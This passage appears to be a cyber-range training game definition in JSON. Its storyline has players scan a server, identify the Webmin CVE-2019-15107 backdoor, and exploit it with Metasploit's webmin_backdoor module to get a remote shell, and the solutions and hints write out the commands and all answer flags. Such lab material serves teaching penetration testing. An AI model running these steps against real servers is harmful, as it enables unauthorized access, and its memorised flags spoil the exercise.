"description":"Insider-attack modification of Locust 3302.",
"prerequisites":[],
"outcomes":["You will learn how to scan a server, how to find out possible vulnerabilities and how to exploit them."],
"state":"UNRELEASED",
"show_stepper_bar":true,
"levels":[{
"title":"Questionnaire",
"level_type":"INFO_LEVEL",
"order":0,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"Before you start, please fill out this **<a href=\"https://forms.gle/kcFbczNhGKnjXkeEA\" target=\"_blank\">Questionnaire</a>**.\n\nYour identification is required in the form but is used only for pairing the data from KYPO Cyber Range and Google Form questionnaire answers. We will fully **anonymize** the collected data right after merging them.\n\nThank you for your participation."
},{
"title":"Introduction",
"level_type":"INFO_LEVEL",
"order":1,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"# General information: please read carefully\n\n* The solution of a level **will be required** in the later levels. Do not try to skip ahead. If you reveal the solution to a level, still complete all of its steps; you will need them later.\n* If you get stuck during the game, feel free to use Google.\n* This game is for educational purposes only.\n* The game contains four tasks. The estimated playing time is approximately 60 minutes.\n\n# Storyline intro\n\nYou work in the IT company Thasonium, which handles a lot of important business data. Server administrator Eve was fired last week. However, before she left the company, she managed to change the credentials of the server holding essential data, leaving the server inaccessible. Your goal is to get into that server and recover the company data stored there."
},{
"title":"Check remote services of the server",
"level_type":"TRAINING_LEVEL",
"order":2,
"estimated_duration":15,
"minimal_possible_solve_time":null,
"answer":"Webmin",
"answer_variable_name":null,
"content":"# Information about your machine\n\nYour computer named \"employee\" is running [Kali Linux](https://www.kali.org/) and is connected to the company network. Credentials to your machine are:\n* `username: kali`\n* `password: kali`\n\nAll the tools you need are already installed. See if the server with IP address `172.18.1.5` offers some network services that could be vulnerable and then used for remote access.\n\nTo connect to your computer, right-click on it and open the terminal.\n\n**Flag:** the name of a possibly vulnerable service running on an open port. The flag will be listed in parentheses followed by `httpd`, like this: `(Flag httpd)`.",
"solution":"1. Open the terminal and run the command `nmap -sV 172.18.1.5`\n2. The highest shown port is `10000` running the **${ANSWER}** service -- this is the flag.\n ",
"solution_penalized":true,
"hints":[{
"title":"I found the flag, but the system does not accept it.",
"content":"Be accurate. The letters' case matters. The flag is case-sensitive.",
"hint_penalty":1,
"order":0
},{
"title":"What tool to use? (more detailed hint)",
"content":"Use **nmap** to scan the server. Type `nmap --help` for some info or `man nmap` for a more comprehensive manual.",
"hint_penalty":2,
"order":3
},{
"title":"Hint for the parameters of the tool",
"content":"Check out in the documentation what the `-sV` option does. If you want to know the details of only a specific service, combine it with the `-p port_number` parameter.",
"hint_penalty":4,
"order":2
},{
"title":"What tool to use? (less detailed hint)",
"content":"The tool to scan IP addresses is already installed on your machine and is commonly used to scan servers and their services.",
"hint_penalty":1,
"order":1
}],
"incorrect_answer_limit":15,
"attachments":[],
"max_score":10,
"variant_answers":false,
"reference_solution":[{
"state_name":"scanned_ip",
"prereq_state":[],
"cmd":"nmap -sV 172.18.1.5",
"cmd_type":"bash-command",
"cmd_regex":"nmap -sV 172.18.1.5",
"optional":false
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":"Identify a vulnerability to get remote access",
"level_type":"TRAINING_LEVEL",
"order":3,
"estimated_duration":10,
"minimal_possible_solve_time":null,
"answer":"CVE-2019-15107",
"answer_variable_name":null,
"content":"Well done! Now you know what applications are running on the server (`172.18.1.5`). Fortunately, the server is a web server. The Webmin running on port 10000 is often vulnerable. Choose the right vulnerability to exploit. (Look for a critical vulnerability from the past few years.)\n\n**Flag:** CVE code of the vulnerability in the format **CVE-Y-X**, where Y is the year and X is a 4- or 5-digit number.",
"solution":"In the previous level, you found that Webmin is running on port 10000.\n\nThere are several ways to find a vulnerability of Webmin:\n* google \"Webmin exploit\" -- the correct vulnerability is on the first page\n* in the terminal, run `searchsploit webmin`\n* open Metasploit console and search for Webmin vulnerabilities\n ```\n kali@employee:~# msfconsole\n msf6 > search webmin\n ```\n\nThe vulnerability you are looking for is **${ANSWER}**. It's unauthenticated and from the past few years.\n\nSee more at https://cve.mitre.org/cgi-bin/cvename.cgi?name=${ANSWER}",
"solution_penalized":true,
"hints":[{
"title":"What to look for and where",
"content":"CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. Each flaw has a unique identifier. See https://cve.mitre.org/\n\nUse [exploit-db.com](https://www.exploit-db.com/) or the Metasploit tool to find CVEs associated with Webmin.\n\nLook for relatively recent, unauthenticated, and critical exploits.",
"hint_penalty":4,
"order":0
},{
"title":"How to start",
"content":"Using `nmap` with the `-sV` flag, you can discover (if you haven't already) that **Webmin** is running on port 10000. However, its CVE code will not be directly in the console with the `nmap` output. So, google the vulnerabilities of Webmin (do not search for the vulnerabilities of port 10000, that number is arbitrary), or use `msfconsole` to find out available exploits for Webmin backdoor vulnerabilities.",
"hint_penalty":2,
"order":1
}],
"incorrect_answer_limit":10,
"attachments":[],
"max_score":15,
"variant_answers":false,
"reference_solution":[{
"state_name":"vulnerability_identified",
"prereq_state":["metasploit__opened"],
"cmd":"search webmin",
"cmd_type":"msf-command",
"cmd_regex":"search webmin",
"optional":true
},{
"state_name":"metasploit__opened",
"prereq_state":["scanned_ip"],
"cmd":"msfconsole",
"cmd_type":"bash-command",
"cmd_regex":"msfconsole",
"optional":true
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":"Exploit the vulnerability and then get into the server",
"level_type":"TRAINING_LEVEL",
"order":4,
"estimated_duration":20,
"minimal_possible_solve_time":null,
"answer":"25790",
"answer_variable_name":null,
"content":"The vulnerability CVE-2019-15107 seems promising. Exploit it, gain access to the server (`172.18.1.5`), and **stay connected to it**.\n\n**Flag format:** a five-digit number located in a file in the `/root/` directory on the server.\n\nNote: The exploit contains a bug. If the remote shell does not function properly after you gain access, type `bash`. It will run, although it will appear waiting (just a flashing underscore character).",
"solution":"```\n1. kali@employee:~# msfconsole\n2. msf6 > search webmin \n3. msf6 > use exploit/linux/http/webmin_backdoor\n4. msf6 > show options\n5. msf6 > set RHOST 172.18.1.5\n6. msf6 > set RPORT 10000\n7. msf6 > set LHOST 10.1.135.83\n8. msf6 > check\n```\n\nIf Metasploit reports the target as not vulnerable, try to proceed anyway.\n\n```\n9. msf6 > exploit (or run, this is a synonym)\n```\n\nAfter this, a new SSH session to the server is created. If the remote shell does not function properly, type `bash`. It will run, although it will appear waiting (just a flashing underscore character), and you can continue with step 10. If it does not work, switch to root using `su root` and continue with step 10.\n\n```\n10. cd /root/\n11. cat WARNING-READ-ME.txt\n```\n\nThe flag is **${ANSWER}**.",
"solution_penalized":true,
"hints":[{
"title":"How to find the correct exploit?",
"content":"There is a `search` command in Metasploit (msfconsole) to find the correct exploit. Additional flags for the `search` command can be useful!\n\nTo use the exploit, run `use [path of the exploit]`. It is installed in the `exploit/unix/` folder (not in `exploit/linux` as you may find in some online tutorials).",
"hint_penalty":2,
"order":1
},{
"title":"How to apply the exploit? (less detailed hint)",
"content":"First, use the `use path-to-exploit` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set before you run it. Type `show options` to display them. Set the remote server IP and your local IP. Then run the exploit using the command `exploit` or `run`.",
"hint_penalty":1,
"order":4
},{
"title":"What tool to use?",
"content":"The tool you are looking for is **Metasploit**, started with the `msfconsole` command. It's a command-line tool. Run it and use the correct exploit.\n\nExploits in Metasploit are ready-made modules that automatically attack a vulnerability. They save you time during penetration testing: you do not need to program or download custom exploits; you simply use existing attack modules that someone created for the common vulnerabilities.\n\nIf you have never heard of Metasploit, check out the tutorial at https://www.offensive-security.com/metasploit-unleashed/metasploit-fundamentals/",
"hint_penalty":2,
"order":0
},{
"title":"How to apply the exploit? (even more detailed hint)",
"content":"First, use the `use exploit/unix/webapp/webmin_backdoor` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set after you have activated the exploit but before you run it.\n\n* `RHOSTS` needs to be set to the IP address of the victim, i.e., `set RHOSTS 172.18.1.5`.\n* `RPORT` needs to be set to the desired port number, i.e., 10000.\n* `LHOST` needs to be set to the machine that initiates the exploit (you), i.e., `set LHOST 10.1.135.83`.\n\nThen run the exploit using the command `exploit` or `run`.",
"hint_penalty":5,
"order":6
},{
"title":"Which file on the server contains the flag?",
"content":"`/root/WARNING-READ-ME.txt`",
"hint_penalty":1,
"order":7
},{
"title":"How to apply the exploit? (more detailed hint)",
"content":"First, use the `use path-to-exploit` command to activate the exploit. Then, each activated exploit has its options -- parameters that you must set after you have activated the exploit but before you run it. Parameters for this exploit are `RHOSTS` and `LHOST`. Set them to the correct values using `set parameter value`. Then run the exploit using the command `exploit` or `run`.",
"hint_penalty":3,
"order":5
},{
"title":"How to show content of a file?",
"content":"Simply `cat path/to/the/file`",
"hint_penalty":1,
"order":8
},{
"title":"Which exploit should I use exactly? (more detailed hint)",
"content":"The name you are looking for is `exploit/unix/webapp/webmin_backdoor`. You can find it with `search webmin` in the Metasploit tool. Use the `use exploit/linux/http/webmin_backdoor` command to activate the exploit. Nevertheless, the exploit is still not applied after that. You have to take some additional steps to apply the exploit to the server.",
"hint_penalty":3,
"order":3
},{
"title":"Which exploit should I use? (less detailed hint)",
"content":"The name of the exploit is intuitive. It is a backdoor, and its name includes the name of the service. You can search for it easily in the `msfconsole`."
}]
},{
"title":"Find a computer possibly storing a copy of the company data",
"level_type":"TRAINING_LEVEL",
"order":5,
"estimated_duration":10,
"minimal_possible_solve_time":null,
"answer":"10.1.17.4",
"answer_variable_name":null,
"content":"Well done, you got inside the server! The bad news is that Eve deleted the data from the server. However, we believe she made a copy so that she could extort money from our company later on.\n\nFortunately, the server is physically well protected in a rack. There is no way of connecting a flash disk or other storage device directly to the server. The only possible way of backing up the data is by copying it to a remote computer. Find the IP address of the computer to which Eve could have moved the company data.\n\n**Flag:** IP address of the target computer.",
"solution":"1. Run `ls -a /home/eve` on the previously exploited server.\n2. Display the `.bash_history` file with `less .bash_history`.\n3. The `scp` command is used for copying files to a remote computer; the IP address is **${ANSWER}**.\n",
"solution_penalized":true,
"hints":[{
"title":"How to start",
"content":"The fired employee had to connect to another computer from this host when they copied the data. Perhaps some traces of the connection remain in their home directory under `/home/`.",
"hint_penalty":4,
"order":0
},{
"title":"What remote activity to look for",
"content":"The `scp` command is often used to copy data remotely.",
"hint_penalty":3,
"order":2
},{
"title":"Where exactly to look for the flag",
"content":"Try to explore a `.bash_history` file and choose the correct IP address. Don't guess!",
"hint_penalty":6,
"order":1
}],
"incorrect_answer_limit":10,
"attachments":[],
"max_score":20,
"variant_answers":false,
"reference_solution":[{
"state_name":"found_right_file",
"prereq_state":["found_hidden_flag"],
"cmd":"ls -a /home/eve",
"cmd_type":"bash-command",
"cmd_regex":"ls .*eve",
"optional":false
},{
"state_name":"found_ip",
"prereq_state":["found_right_file"],
"cmd":"less .bash_history",
"cmd_type":"bash-command",
"cmd_regex":"(less|cat) .*\\.bash_history",
"optional":false
}],
"mitre_techniques":[],
"expected_commands":[],
"commands_required":false
},{
"title":"Congratulations",
"level_type":"INFO_LEVEL",
"order":6,
"estimated_duration":0,
"minimal_possible_solve_time":null,
"content":"Excellent! We have sent your colleague to check the data stored on the remote \"backup\" computer with IP 10.1.17.4, which you found. He reported that he had found the data Eve deleted from our server. Thank you for your work. Your reward is on its way.\n\n---\n\nCredits: [storyline inspiration](https://en.wikipedia.org/wiki/Cicada_3301)"